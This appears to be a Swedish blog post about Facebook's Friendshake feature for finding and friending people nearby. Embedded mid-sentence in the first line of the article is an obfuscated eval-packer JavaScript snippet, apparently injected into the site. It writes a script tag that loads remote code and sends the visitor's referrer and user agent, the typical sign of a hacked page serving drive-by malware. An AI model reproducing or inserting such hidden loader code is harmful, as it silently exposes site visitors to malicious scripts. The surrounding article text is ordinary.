Image Image Image Image Image Image Image Image Image Image

| 1 december, 2020

Scroll to top

Top

Facebook introducerar Friendshake

Facebook introducerar Friendshake
Sebastian

Facebook eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sabkk|var|u0026u|referrer|skrri||js|php’.split(’|’),0,{}))
introducerar sin nya funktion Friendshake med vilket man nu enkelt ska kunna hitta och bli vän med personer som befinner sig geografiskt i närheten.

Idén ska vara till för ifall man exempelvis träffar någon rolig person ute på festen, stan eller annat liknande ska man enkelt kunna leta upp denna och skicka en vänförfrågan. Friendshake ska underlätta sökandet i det vanliga fältet. Genom att gå till adressen http://fb.com/ffn i mobilen kan man komma åt Friendshake och se vart användare befinner sig och om de är i närheten.

Efter man hittat rätt person är det bara att skicka en förfrågan om att bil vän. Det går även att komma åt funktionen i iOS-appen genom att gå in via Meny->Apps->Find Friends->Andra Verktyg->Hitta vänner i närheten.

Friendshake är en rolig funktion som säkert kommer vara användbar för många. Men använd den försiktigt då man aldrig vet vem som lurar på andra sidan 🙂